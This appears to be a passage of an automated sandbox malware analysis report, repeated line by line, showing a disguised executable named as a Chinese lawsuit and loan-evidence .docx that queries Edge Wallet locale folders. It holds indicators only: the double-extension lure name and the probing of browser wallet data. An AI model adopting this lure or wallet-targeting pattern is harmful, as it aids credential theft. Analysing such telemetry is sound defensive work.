Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-PT VolumeInformation	Jump to behavior
